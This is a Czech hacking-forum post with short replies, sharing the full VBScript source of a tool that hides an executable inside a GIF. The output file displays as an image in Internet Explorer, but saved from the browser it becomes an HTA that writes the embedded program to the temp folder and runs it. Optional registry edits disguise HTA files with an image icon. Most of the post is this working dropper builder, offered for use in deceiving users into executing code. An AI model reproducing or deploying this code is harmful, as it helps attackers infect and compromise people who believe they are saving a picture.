Steganography hide EXE data within a GIF image

HackForum

Steganography hide EXE data within a GIF image #
objevil jsem dost good vbs script který schová do *.GIF souboru spustitelný kód ... A nejlepší na tom je že v IE a firefox se ten obrázek zobraí a když naněj kliknete pravým tlačítkem na myši a dáte "Uložit Jako .." tak se Uloží jak SOUBOR.HTA ve kterém je spustitelný kód ....

Toto je odkaz na autora [link]

v tomto obrázku je prográmek na Hypnotic (hypnotyzování točící se spirála)
[link]
'Zdrojový kód
' Title: Steganography: Hiding Data Within Data.
' Author: Vengy! (-_-)
' Tested: WinXP SP2 IE 6.0
' Email: cyber_flash@hotmail.com


' How it works:
' -------------
' Usage: cscript.exe hide.vbs your.gif your.exe

' This script merges "your.gif" and "your.exe" to create "your.gif.hta.gif",
' which correctly displays using the IE browser. ;)
' If the 'Hide extension for known file types' option is enabled, which is the default setting,
' the "Save Picture As..." downloads it as "your.gif". (it's really "your.gif.hta")


' Important:
' ----------
' Not all GIFs will work!? Trial and error is the best method
' to find suitable images. Included are some working GIFs that
' will merge correctly with any EXE. The image "your.gif" must be a GIF89a type and *not* GIF87a.


' GIF87a Versus GIF89a:
' ---------------------
' There are technically two types of GIF file: GIF87a and the newer, improved GIF89a.
' Both are fully supported on most browsers, and both use .gif as their file name suffix.
' GIF87a is the original format for indexed color images.
' It uses LZW compression and has the option of being interlaced.

' GIF89a is the same, but also includes transparency and animation capabilities.
' If you want to add these features to your graphic, you'll need to create the graphic with a tool
' that supports the GIF89a format. These features have become so popular with web developers that
' this format has become thede facto standard on the Web today.


' +------------------------------------------
----------------------------------+
' | Let the games begin! |
' +------------------------------------------
----------------------------------+

Option Explicit

Dim data,p,i,f,file,ub,ts,pic_buf,pic,args,x

set args=WScript.Arguments

If args.Count<>2 Then
WScript.Echo "Please type the following: cscript.exe hide.vbs your.gif your.exe"
WScript.Quit
End If

pic=args(0)
file=args(1)

Dim o:Set o=CreateObject("Scripting.FileSystemObject"
)
Dim s:Set s=CreateObject("WScript.Shell")

'To change the HTA file icon to a GIF, uncomment these 2 lines:
's.RegWrite "HKLM\SOFTWARE\Classes\htafile\","GIF Image","REG_SZ"
's.RegWrite "HKLM\SOFTWARE\Classes\htafile\DefaultIcon\
","%SystemRoot%\system32\shimgvw.dll,2","RE
G_SZ"

Set f=o.CreateTextFile(pic&".hta.gif",2)

WScript.Echo "Processing "&pic&" ..."

pic_buf=RSBinaryToString(ReadBinaryFile(pic
))

' Remove end of gif hex tag 3B.
f.Write Left(pic_buf,len(pic_buf)-1)

' +------------------------------------------
----------------------------------+
' | BEGIN: GIF comment block. |
' +------------------------------------------
----------------------------------+

' Start new block tag.
f.Write chr(Int("&H21"))

' Comment tag.
f.Write chr(Int("&HFE"))

' Length of subblock. Seems to work!?
f.Write chr(Int("&HFF"))

' Start data vbscript
f.WriteLine "<script language=vbs>"
f.WriteLine "Set o=CreateObject("&chr(34)&"Scripting
.FileSystemObject"&chr(34)&")"
f.WriteLine "Set s=CreateObject("&chr(34)&"WScript.S
hell"&chr(34)&")"
f.WriteLine "p=o.GetSpecialFolder(2)&"&chr(34)&
amp;"\"&file&chr(34)

' Create data hex array.
f.Write "t=split("&chr(34)
WScript.Echo "Processing "&file&" ..."
data=AsciiToHex(RSBinaryToString(ReadBinary
File(file)))
ub=UBound(data)
For i=0 To ub-1
f.Write data(i)&","
Next
f.Write data(ub)
f.WriteLine chr(34)&","&chr(34)&","&chr
(34)&")"

f.WriteLine "Set f=o.CreateTextFile(p,2)"
f.WriteLine "For i=0 To UBound(t)"
f.WriteLine "f.Write chr(Int("&chr(34)&"&H"&chr(
34)&"&t(i)))"
f.WriteLine "Next"
f.WriteLine "f.close"

' Run the data!
f.WriteLine "s.run(p)"

f.WriteLine "close()"

' End data vbscript.
f.WriteLine "</script>"

' End of comment block.
f.Write chr(Int("&H00"))

' +------------------------------------------
----------------------------------+
' | END: GIF comment block. |
' +------------------------------------------
----------------------------------+

' Insert end of gif tag.
f.Write chr(Int("&H3B"))

f.Close

' +------------------------------------------
----------------------------------+
' | Done. Your.gif.hta.gif has been created. |
' +------------------------------------------
----------------------------------+

Set x=o.GetFile(pic&".hta.gif")

WScript.Echo "Created "&chr(34)&pic&".hta.gif"&ch
r(34)&" (bytes="&x.Size&")"


' +------------------------------------------
----------------------------------+
' | Turns ASCII string sData into array of hex numerics. |
' +------------------------------------------
----------------------------------+
Function AsciiToHex(sData)
Dim i, aTmp()

ReDim aTmp(Len(sData) - 1)

For i = 1 To Len(sData)
aTmp(i - 1) = Hex(Asc(Mid(sData, i)))
If len(aTmp(i - 1))=1 Then aTmp(i - 1)="0"+ aTmp(i - 1)
Next

ASCIItoHex = aTmp
End Function


' +------------------------------------------
----------------------------------+
' | Converts binary data to a string (BSTR) using ADO recordset. |
' +------------------------------------------
----------------------------------+
Function RSBinaryToString(xBinary)
Dim Binary
'MultiByte data must be converted To VT_UI1 | VT_ARRAY first.
If vartype(xBinary)=8 Then Binary = MultiByteToBinary(xBinary) Else Binary = xBinary
Dim RS, LBinary
Const adLongVarChar = 201
Set RS = CreateObject("ADODB.Recordset")
LBinary = LenB(Binary)

If LBinary>0 Then
RS.Fields.Append "mBinary", adLongVarChar, LBinary
RS.Open
RS.AddNew
RS("mBinary").AppendChunk Binary
RS.Update
RSBinaryToString = RS("mBinary")
Else
RSBinaryToString = ""
End If
End Function


' +------------------------------------------
----------------------------------+
' | Read Binary file |
' +------------------------------------------
----------------------------------+
Function ReadBinaryFile(FileName)
Const adTypeBinary = 1
Dim BinaryStream : Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.LoadFromFile FileName
ReadBinaryFile = BinaryStream.Read
BinaryStream.Close
End Function

(odpovědět)
BOGIIE & Hacker112 | 85.207.107.*26.12.2006 10:14
re: Steganography hide EXE data within a GIF imag#
Dobrá věcička :)
(odpovědět)
127.0.0.1 | 88.146.11.*26.12.2006 13:51
re: Steganography hide EXE data within a GIF image #
V Opeře nejde 8-) je to asi bezpečný prohlížeč. Ale je docela LOL!!

----------
nehádej se, nemá to cenu | osobní blog: [link]
(odpovědět)
mzk | E-mail | Website26.12.2006 15:47
re: Steganography hide EXE data within a GIF imag#
Kombinace FF 2 a W98 taky nefacha..
(odpovědět)
Nemam | 72.22.69.*26.12.2006 16:21

Zpět
Svou ideální brigádu na léto najdete na webu Ideální brigáda
 
 
 

 
BBCode